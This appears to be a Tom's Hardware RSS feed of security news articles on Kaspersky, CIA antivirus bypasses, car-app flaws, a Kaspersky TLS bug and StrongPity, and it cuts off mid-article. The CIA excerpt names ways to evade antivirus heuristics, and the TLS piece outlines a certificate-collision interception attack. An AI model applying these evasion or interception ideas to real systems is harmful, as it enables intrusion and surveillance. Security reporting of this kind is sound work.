<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" mos="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>Earlier today, an <a href="http://abcnews.go.com/US/officials-fear-russia-target-us-popular-software-firm/story?id=47295729">ABC News report</a> said that the FBI is investigating Russian security company Kaspersky Lab because U.S. officials have concerns about the company’s ties to Russian intelligence. Kaspersky stated that the allegations are false.</p><h2 id="russian-antivirus">Russian Antivirus</h2><p><span>The Kaspersky antivirus and related security solutions are some of the most popular, with over 400 million users around the world. However, in the current U.S. political climate, Kaspersky’s Russian origin, as well as the founder’s and other executives' history with the Russian intelligence services, have prompted the FBI and some Congressional officials to raise questions about the potential damage the software could cause in the wrong hands.</span></p><p><span>Kaspersky Lab was founded by <a href="https://www.tomshardware.com/news/kaspersky-iot-internet-of-threats,29450.html">Eugene Kaspersky</a>, who went to a <a href="https://foreignpolicy.com/2012/11/26/the-fp-top-100-global-thinkers-2">KGB-sponsored technical college</a> and has since done work for the Russian military. 
Kaspersky himself has repeatedly denied allegations that he is working closely with the Russian government or that his company is building offensive solutions for the Russian government or any other government.</span></p><p>However, <a href="https://www.bloomberg.com/news/articles/2015-03-19/cybersecurity-kaspersky-has-close-ties-to-russian-spies">another report</a> in 2015 said that since 2012, high-level officials at Kaspersky Lab have left or been fired and replaced with executives that are friendlier to the Russian government.</p><h2 id="kaspersky-responds">Kaspersky Responds</h2><p>One of the accusations brought against Kaspersky today, but also in the past, is that the new executives that are friendly to the Russian government could use the information gathered from the company’s 400 million users to aid Russian intelligence.</p><p>Kaspersky said that the data is anonymized and that users can disable the telemetry reporting at any time. Enterprise customers can also install a local and private Kaspersky Security Network (KSN) to ensure data isn’t transferred to outside servers.</p><p>The company also added that it routinely obtains licenses and certificates in all the countries in which it operates to ensure that it’s in compliance with the required security standards. Kaspersky argued that this should demonstrate that the company’s solutions are trustworthy.</p><p>Kaspersky added that it will assist all government agencies with ongoing investigations, but that it believes a deeper examination of its products will prove the allegations were unfounded.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Most Major Antivirus Programs Bypassed By The CIA, Shows WikiLeaks Document ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/antivirus-programs-bypassed-cia-wikileaks,33845.html</link>
                                                                            <description>
                            <![CDATA[ WikiLeaks' publication of alleged CIA documents reveals that most popular antivirus tools have been hacked and bypassed by the intelligence agency. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">b8QrZQNTwnLvbUUFuQWNnS</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 08 Mar 2017 17:50:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:28:58 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:640px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf.jpg" mos="https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf.jpg" align="" fullscreen="1" width="640" height="480" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/C5WVsueG27PntZ8nqoBLf.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>WikiLeaks recently published thousands of documents that the organization said belong to the CIA. Among them, there was a document that showed a list of antivirus and other security products that have been exploited and bypassed by the CIA.</span></p><p><span>The list included the following software products:</span></p><ul><li>Comodo</li><li>Avast</li><li>F-Secure</li><li>Zemana Antilogger</li><li>Zone Alarm</li><li>Trend Micro</li><li>Symantec</li><li>Rising</li><li>Panda Security</li><li>Norton</li><li>Malwarebytes Anti-Malware</li><li>EMET (Enhanced Mitigation Experience Toolkit)</li><li>Microsoft Security Essentials</li><li>McAfee</li><li>Kaspersky</li><li>GDATA</li><li>ESET</li><li>ClamAV</li><li>Bitdefender</li><li>Avira</li><li>AVG</li></ul><p><span>You probably recognize most, if not all, of the products on that list. 
The list includes Microsoft’s “Security Essentials” antivirus program, which was later converted into the built-in “Windows Defender” program in Windows 8 and later, as well as EMET, Microsoft’s anti-exploit security tool (mainly for enterprise users).</span></p><p><span>EMET was recently <a href="https://blogs.technet.microsoft.com/srd/2016/11/03/beyond-emet/">deprecated by Microsoft</a>, because the company said that many of EMET’s anti-exploit features, such as DEP, ASLR and Control Flow Guard (CFG), as well as other mitigations against User Account Control (UAC) bypasses, were already built into Windows 10.</span></p><p><span>Microsoft said that because the security features are built-in, they should offer better security than the ad-hoc security that EMET tried to provide. The CIA documents released by WikiLeaks date from 2014, before Windows 10 came out. Therefore, we don't know what new capabilities the CIA may have obtained since then, and whether or not the new Windows 10 security features were also bypassed.</span></p><h2 id="bypassing-antivirus-programs">Bypassing Antivirus Programs</h2><p><span>The leaked documents pertaining to the list of antivirus programs that have been exploited by the CIA seem to have been redacted, likely by WikiLeaks. The organization said that it made over 70,000 redactions in total, mainly to remove harmful code (WikiLeaks has been accused in the past of “hosting malware” because the emails it released contained malware targeted at the recipients of the leaked emails), as well as personal details and IP addresses. 
However, it’s not clear why the organization removed the technical information about how most of the antivirus programs in the list were exploited.</span></p><p><span>Only partial information was left about the CIA’s exploit capabilities against three antivirus programs: F-Secure, Avira, and AVG.</span></p><p><em><strong><span>On F-Secure</span></strong></em></p><p>In OSB's experience, F-Secure has generally been a lower tier product that causes us minimal difficulty. The only annoyance we have observed is that F-Secure has an apparent entropy-based heuristic that flags Trojaned applications or other binaries containing encrypted/compressed payloads. Two defeats are known to exist: One involves using RAR file string tables in the resource section, the other involves cloning a RAR file manifest file – the manifest technique also works against Avira's entropy-based heuristics.</p><p><em><strong><span>On Avira</span></strong></em></p><p>Avira has historically been a popular product among CT targets, but is typically easy to evade. Similar to F-Secure, Avira has an apparent entropy-based heuristic that flags binaries containing encrypted/compressed payloads, but there are two known defeats.</p><p><em><strong><span>On AVG</span></strong></em></p><p>AVG Catches a Payload Dropped to Disk and Launched via Link File Well After Execution (Process Hollowing)</p><p><span>Perhaps the fact that the CIA can bypass most antivirus products should not be that surprising. After all, any sophisticated attacker who wants to develop new malware would also try to find ways to bypass the popular antivirus products. Otherwise, the malware wouldn’t be very effective, and it would be caught too early.</span></p><p><span>Google’s Project Zero security research team has also shown that antivirus programs can sometimes be some of the most vulnerable programs you may be running on your system. 
That’s not just because some of the antivirus companies are careless with the code they write, but mainly because the same techniques they use to “make users safer” are what create the vulnerabilities in users’ systems in the first place. </span></p><p><span>For instance, some of them do <a href="https://www.tomshardware.com/news/kaspersky-antivirus-tls-interception-vulnerability,33327.html">man-in-the-middle attacks</a> against users’ browsers in order to analyze the encrypted pages that the users are visiting. However, an attacker could exploit this by taking over the capability and then using it against the users. Therefore, in this case, the antivirus created a vulnerability that perhaps wouldn’t have existed otherwise.</span></p><h2 id="staying-safe-online">Staying Safe Online</h2><p><span>The most common sense ways to stay safe are still to be careful about what you install on your system, use accounts with <a href="https://www.avecto.com/news-and-events/news/94-of-critical-microsoft-vulnerabilities-mitigated-by-removing-admin-rights/">limited rights</a> by default, and <a href="https://www.sans.org/course/implementation-auditing-top-4-mitigation-strategies">update</a> your operating system and applications on time. This should save you from the vast majority of attacks and malware. </span></p><p><span>If you want to go the extra mile, you could also browse the web in a Linux virtual machine, or even use a more compartmentalized operating system such as <a href="https://www.tomshardware.com/news/qubes-os-3-2-released-xfce4,32777.html">Qubes OS</a>, but these tools may not be for everyone.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Car Makers Haven’t Learned: Insecure Apps Expose Millions Of Connected Cars To Theft, Risks ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/insecure-apps-connected-cars-risks,33682.html</link>
                                                                            <description>
                            <![CDATA[ Car makers seem no closer to adopting strong security for their cars and related systems, even as we're years away from having to trust fully automated cars to drive us around safely. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">H7ny9QNcV9g7Ae8H7jNv5H</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Fri, 17 Feb 2017 14:50:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:04 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:699px;"><p class="vanilla-image-block" style="padding-top:48.50%;"><img id="" name="" alt="Kaspersky's hidden list of car makers' applications" src="https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V.png" mos="https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V.png" align="" fullscreen="1" width="699" height="339" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/r7b3DJuBFvdo7FtJdnKK2V.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="caption-text">Kaspersky's hidden list of car makers' applications </span></figcaption></figure><p><span>Even as most car manufacturers want to deliver autonomous cars in the next few years, they still seem to be far behind in adopting security best practices to keep cars and drivers safe. According to Kaspersky, the Android apps of well-known car makers could now expose millions of cars to theft or other risks. The manufacturers still don't seem to be treating security as the life-and-death issue that it is when it comes to smart cars and autonomous vehicles.<br/></span></p><h2 id="connected-cars">Connected Cars</h2><p><span>The idea of a “connected car” started becoming popular a few years ago, as manufacturers wanted to give users more “smart features” that would set their cars apart from those of the competitors. 
</span></p><p><span>The smart features, which you can enable through smartphone applications, include finding out the </span><span>GPS coordinates of a car, tracing its route, opening its doors, starting its engine, and turning on its auxiliary devices.</span><span> The issue with these features is that if you give smartphone applications the ability to control a car’s engine over the internet, it would be roughly as easy for an attacker to take control of that car’s engine <a href="https://www.tomshardware.com/news/nissan-leaf-hacked-web-link,31275.html">over the internet</a> as well. </span></p><p><span>One of the most important security principles is reducing the attack surface. Car makers seem to be doing the exact opposite right now, by implementing </span><span><span>over-the-internet </span>remote control for cars’ most critical systems. Components such as the engine, brakes, wheels, or anything that, if taken over by bad actors, would jeopardize the driver’s life, should never be controlled directly over the internet. </span></p><p><span>This is really the same principle that IoT makers should abide by as well, except in this case it’s not just your privacy that’s at stake, but your actual car (if it’s stolen), or even your life.</span></p><h2 id="kaspersky-s-app-report">Kaspersky’s App Report</h2><p><span>Kaspersky reviewed seven of the most popular applications from well-known car manufacturers to see if they can be used to gain access to the car’s infrastructure. Kaspersky has decided to keep the names of the manufacturers hidden for now, although it would’ve probably served the public’s interest much more if it had made them all public, at least after they all announce that they’ve fixed their apps. </span></p><p><span>Car makers haven’t shown a willingness to significantly improve their systems’ security so far. 
It’s likely that this isn’t going to change much if such reports hide their names so the car manufacturers don’t have to suffer any of the consequences for it.</span></p><p><span>The security company reviewed the following aspects in the apps:</span></p><ul><li>Availability of potentially dangerous features that would make it possible for someone to steal the car</li><li>Whether the app employs obfuscation techniques to make it hard to reverse engineer it</li><li>Whether the app checks for root permissions on the car owner’s Android device. Rooted devices allow malware to infect other apps much more easily</li><li>Availability of GUI overlay protection to stop bad actors from stealing credentials</li><li>Availability of an integrity check that verifies whether the app’s code has been changed</li></ul><p><span>As we can see from Kaspersky’s table below, all of the apps failed all of Kaspersky’s tests. Perhaps the most incredible one is that none of these well-known car makers seem to be encrypting users’ credentials. These are the same car makers that we’ll have to trust in a few years with their autonomous cars to safely drive us around, yet they can’t even implement 1990s-era internet security guidelines for their cars and related systems.</span></p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:698px;"><p class="vanilla-image-block" style="padding-top:108.31%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/ruckMEYXjqkLLbGyFubMRK.jpg" mos="https://cdn.mos.cms.futurecdn.net/ruckMEYXjqkLLbGyFubMRK.jpg" align="" fullscreen="1" width="698" height="756" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/ruckMEYXjqkLLbGyFubMRK.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><h2 id="car-theft-and-more">Car Theft And More</h2><p><span>According to Kaspersky, the primary risk for these vulnerabilities is 
that car thieves could unlock the doors more easily, and then use programming units to “write a new key into the car’s on-board system”, another consequence, if you will, of making cars "smarter." The thieves can steal the cars without ever having to break any physical part. However, according to Kaspersky, car stealing is not the only thing that should scare you, if you’re an owner of one of these cars:</span></p><p>“Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death,” said Kaspersky in its report.</p><h2 id="autonomous-cars">Autonomous Cars</h2><p><span>Car makers don’t seem to have figured out a solid plan for protecting their connected cars against hackers yet, or even to design their smart features in a secure way. However, they’re already moving full steam ahead to ship autonomous vehicles over which a driver (or rather a passenger) has no control.</span></p><p><span>Autonomous vehicles, or vehicles with autonomous driving systems that still allow the driver to take control when needed, will likely end up saving millions of lives because of their increased safety on the road. However, they could also expose their owners to other types of dangers, from <a href="https://www.tomshardware.com/news/tesl-model-s-remote-hack,32722.html">hacking</a> while on the road to <a href="https://www.tomshardware.com/news/ransomware-smart-cities-autonomous-cars,33093.html">ransomware</a> that locks the car until the owner pays a significant sum of money. </span></p><p><span>All of this could be mostly avoided if car makers start treating security as seriously as they do developing self-driving systems and electric vehicle platforms. 
The digital security of these future cars will be just as important for their businesses, especially if makers of autonomous vehicles end up liable for accidents (as it would be their systems controlling the cars at all times, rather than the drivers).</span></p><h2 id="time-for-car-makers-to-be-responsible">Time For Car Makers To Be Responsible</h2><p><span>The real crux of the problem here is that car makers should already know that Android devices, or even iPhones, can be exposed to all sorts of security vulnerabilities. That’s why they shouldn’t be trusting them with control over the cars’ door locks, let alone giving them remote control over the cars’ engines.</span></p><p><span>This is less of a technological issue, such as whether the car makers enabled integrity and root checks for their apps, and more of a responsibility issue. Allowing remote access through apps to car doors and engines just to slightly one-up the competition doesn’t seem like a responsible thing to do from these well-known car brands, and that needs to change.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Google Security Researcher Finds Serious Vulnerability In Kaspersky's TLS Interception Tool ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-antivirus-tls-interception-vulnerability,33327.html</link>
                                                                            <description>
                            <![CDATA[ Google Project Zero security researcher Tavis Ormandy found yet another vulnerability in the Kaspersky antivirus, this time involving Kaspersky's flawed TLS interception techniques. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">MnKrH6cdKadiCcKMXd5rF7</guid>
                                                                                                                            <pubDate>Wed, 04 Jan 2017 20:22:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:700px;"><p class="vanilla-image-block" style="padding-top:74.43%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/xiWy7cExvL3NtRsrCjB35b.png" mos="https://cdn.mos.cms.futurecdn.net/xiWy7cExvL3NtRsrCjB35b.png" align="" fullscreen="1" width="700" height="521" attribution="" endorsement="" class="pull- expandable"></p></div></div></figure><p><span>After previously discovering <a href="https://googleprojectzero.blogspot.ro/2015/09/kaspersky-mo-unpackers-mo-problems.html">other vulnerabilities</a> in the Kaspersky antivirus program, Google’s Project Zero security researcher, <a href="https://www.tomshardware.com/news/researchers-zero-day-bugs-lastpass-passwords,32339.html">Tavis Ormandy</a>, has found <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=978">another puzzling one</a>. The issue lies with Kaspersky’s interception of HTTPS traffic with its own certificate in order to scan for web threats.</span></p><h2 id="antivirus-tls-interception">Antivirus TLS Interception</h2><p><span>The Kaspersky antivirus, just like a few other antivirus tools, offers users the option (sometimes enabled by default) to scan inside TLS/HTTPS connections, too. Before websites started moving to HTTPS encryption, antivirus or other web analysis tools could simply look at the traffic as it arrived at the browser. 
However, that’s no longer possible with websites that have <a href="https://www.tomshardware.com/news/lets-encrypt-one-million-certificates,31352.html">encrypted their traffic</a>.</span></p><p><span>To continue analyzing that traffic, these tools need to install their own root certificate on the user’s computer and then decrypt the traffic themselves. This is the same mechanism a man-in-the-middle attack uses. The difference is that, presumably, users are aware this is happening when they enable the web scanning option in their antivirus program, and that they trust the antivirus company not to do anything nefarious with their web activity.</span></p><p><span>In practice, it’s likely that most users aren’t aware the antivirus software can see their traffic, because not everyone is familiar with the intricacies of antivirus and security technologies. This “solution” to encrypted web threats may therefore unnecessarily put most users at risk without their understanding what is happening. 
Some security experts, such as Thomas Ptacek, believe no antivirus program should be allowed to intercept all TLS web traffic.</span></p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:746px;"><p class="vanilla-image-block" style="padding-top:48.12%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/tcodUpzLwpgMLBPBFY3NWW.jpg" mos="https://cdn.mos.cms.futurecdn.net/tcodUpzLwpgMLBPBFY3NWW.jpg" align="" fullscreen="1" width="746" height="359" attribution="" endorsement="" class="pull- expandable"></p></div></div></figure><h2 id="kaspersky-39-s-new-vulnerability">Kaspersky's New Vulnerability</h2><p>According to Ormandy, the Kaspersky antivirus installs its own root certificate on the user’s computer, and does so in a way that’s <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=989">not well protected</a>, either. It then replaces every visited website’s certificate with a leaf certificate it generates itself. So far, this is expected behavior for web scanning tools (although users should still be wary of which tool they allow to do this on their computers).</p><p><span>The problem Ormandy discovered is that Kaspersky was re-using 32-bit keys for its leaf certificates. This would make it easy for an outside attacker to brute-force a collision and intercept the traffic of multiple sites when Kaspersky users accessed them. 
</span></p><p><span>The bug would either prevent users from connecting to the websites, or the websites would be downgraded to unencrypted HTTP connections, allowing attackers to potentially intercept the connections.</span></p><p><span>According to the Google engineer, an attack would go like this:</span></p><p>- Mallory wants to intercept mail.google.com traffic, for which the 32bit key is 0xdeadbeef.<br/>- Mallory sends you the real leaf certificate for mail.google.com, which Kaspersky validates and then generates its own certificate and key for.<br/>- On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let's say attacker.com)<br/>- Now Mallory redirects DNS for mail.google.com to attacker.com, Kaspersky starts using their cached certificate and the attacker has complete control of mail.google.com.</p><p><span>Ormandy thought it was “incredible” that the Kaspersky team hadn’t noticed, even by accident, that they would sometimes get certificate errors. However, he doesn’t venture to say that Kaspersky may have introduced this vulnerability on purpose.</span></p><p><span>Ormandy also noted that because Google uses its new open source encrypted transport protocol, <a href="https://www.chromium.org/quic">QUIC</a>, for its own services when they are accessed from Chrome, Kaspersky is in fact unable to decrypt connections to Google services in Chrome, although it can do so in Firefox and other browsers.</span></p><p><span>Google's researcher told Kaspersky about the vulnerability on November 1, and the typical <a href="http://www.tomshardware.co.uk/google-microsoft-windows-kernel-vulnerability,news-54157.html">90-day disclosure policy</a> applied. The bug was fixed by the time the 90-day deadline passed. 
Therefore this particular vulnerability may no longer put users at risk, but all the broader issues with antivirus TLS interception remain.</span></p><h2 id="does-antivirus-software-make-you-safer">Does Antivirus Software Make You Safer?</h2><p><span>The primary reason for using an antivirus tool is to protect yourself against malware that takes advantage of existing and well-known vulnerabilities. Some, or perhaps many, users don’t update their operating systems or applications on time, which leaves them vulnerable to malware. In such cases, antivirus software can play a useful role in keeping those users safe.</span></p><p><span>However, for users who always update their operating systems and applications on time, antivirus software is much less necessary, because the vulnerabilities that malware would normally exploit have already been closed.</span></p><p><span>There are “zero-day” vulnerabilities as well, of course, for which by definition there's no patch. However, antivirus software can’t protect you from zero-day vulnerabilities either. Some products, including the Kaspersky Antivirus, do offer some limited <a href="https://support.kaspersky.com/11152">anti-exploit protections</a>, but you may have to balance that against the fact that the antivirus itself may make you less secure.</span></p><p><span>There likely isn’t a definitive answer to whether antivirus software makes you safer. For people who can’t or won’t update their systems, chances are that antivirus software does make them safer. For others, who are always up to date, it may be worth investing more in <a href="http://www.tomshardware.co.uk/malwarebytes-3-anti-exploit-anti-ransomware,news-54370.html">specialized anti-exploit tools</a>, or, even better, sandboxing and other virtualization technologies that wouldn’t allow malware to harm the main operating system.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ StrongPity 'Advanced Persistent Threat' Goes After WinRAR, TrueCrypt Users, Says Kaspersky ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/strongpity-apt-winrar-truecrypt-attack,32836.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky warned that there has been an escalation in attacks against users trying to download WinRAR and TrueCrypt installers from the internet. The attackers infect the popular installers on various fake or existing websites that distribute the files. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">DGVgkSiRXHiHPkppxQDZy5</guid>
                                                                                                                            <pubDate>Mon, 10 Oct 2016 20:25:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:03 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" mos="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"></p></div></div></figure><p><span>Kaspersky announced the discovery of a new "advanced persistent threat" (APT) attack called "StrongPity." The attack involved infecting installers of WinRAR and TrueCrypt on sites that distributed the two apps.</span></p><h2 id="encryption-tools-users-targeted">Encryption Tools Users Targeted</h2><p><span>Kaspersky’s research team has noticed that over the past few months there has been an escalation in attacks against users looking mainly for two software programs: WinRAR and TrueCrypt.</span></p><p><span>TrueCrypt, which has been <a href="http://truecrypt.sourceforge.net/">abandoned</a> by its original authors but has been continued through other projects such as <a href="https://veracrypt.codeplex.com/">VeraCrypt</a>, is well-known drive encryption software. WinRAR is a <a href="http://www.rarlab.com/">popular file archiver</a> utility for Windows, but it’s also often used to encrypt files.</span></p><h2 id="waterhole-attacks">Waterhole Attacks</h2><p><span>The users were infected through “waterhole attacks,” which place malware on websites that the targeted users are likely to visit. 
The StrongPity attackers inserted trojans into the installer files of <a href="https://www.tomshardware.com/news/winrar-vulnerability-remote-code-execution,30204.html">WinRAR</a> and TrueCrypt on various distributor sites, from where users would download them and infect their own systems.</span></p><p><span>The attackers are able to take complete control of the victims’ systems through the infected installers. They can also steal disk contents and download additional malware components that allow them to collect contacts and monitor communications.</span></p><h2 id="belgium-and-italy-most-targeted">Belgium And Italy Most Targeted</h2><p><span>Users were most targeted in Belgium and Italy. In Belgium, the attackers built fake websites from which they made the infected installers available. In Italy, the StrongPity attackers infected the software installers on an existing software distribution website. Kaspersky noticed the fraudulent activity in both Belgium and Italy earlier this year, in May.</span></p><p><span>Kaspersky Lab data revealed that over a single week, hundreds of systems throughout Europe and Northern Africa/Middle East were infected by StrongPity malware.</span></p><p>“The techniques employed by this threat actor are quite clever. They resemble the approach undertaken in early 2014 by the Crouching Yeti/Energetic Bear APT, which involved trojanizing legitimate IT software installers for industrial control systems and compromising genuine distribution sites,” said Kurt Baumgartner, principal security researcher, Kaspersky Lab. “These tactics are an unwelcome and dangerous trend that the security industry needs to address. The search for privacy and data integrity should not expose an individual to offensive waterhole damage. 
Waterhole attacks are inherently imprecise, and we hope to spur discussion around the need for easier and improved verification of encryption tool delivery," he added.</p><h2 id="code-signing-and-verification">Code Signing And Verification</h2><p><span>The ideal protection against this sort of attack, where you receive an infected file that should otherwise be legitimate, is "code signing" and "signature verification." This is especially important for encryption software, which is more likely to be targeted by sophisticated attackers such as nation-states.</span></p><p><span>However, checking a file’s signature isn’t easy enough for most people, so most don’t bother or don’t even know how to do it. Easier ways to verify a file’s integrity against the original source are needed. Until then, Kaspersky said, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Founder: IoT Stands For 'Internet Of Threats' ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-iot-internet-of-threats,29450.html</link>
                                                                            <description>
                            <![CDATA[ In a recent interview on NBC News, Kaspersky founder Eugene Kaspersky said that IoT devices will greatly expand the number of online threats that we'll see in the future. He even called IoT the "Internet of Threats." ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">WmFMbgNNx7zyGmma6mqqXE</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/vmoeUhQnM5ieFjAyw3Cecn-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 25 Jun 2015 13:50:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:10 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/vmoeUhQnM5ieFjAyw3Cecn-1280-80.jpg">
                                                            <media:credit><![CDATA[Cisco]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/vmoeUhQnM5ieFjAyw3Cecn-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:650px;"><p class="vanilla-image-block" style="padding-top:61.54%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/vmoeUhQnM5ieFjAyw3Cecn.jpg" mos="https://cdn.mos.cms.futurecdn.net/vmoeUhQnM5ieFjAyw3Cecn.jpg" align="" fullscreen="1" width="650" height="400" attribution="" endorsement="" class="pull- expandable"></p></div></div></figure><p><span>In a recent <a href="http://www.nbcnews.com/tech/security/kaspersky-smart-fridges-internet-things-i-call-it-internet-threats-n380541">interview</a> on NBC News, the founder of the Kaspersky anti-virus company, Eugene Kaspersky, said that in the future it won't be just PCs or smartphones getting hacked, but everything that's called "smart."</span></p><p><span>That includes smart fridges, smart coffee machines, smart cars, smart TVs, smart homes, and so on. "You are watching the TV, the TV is watching you," he added. 
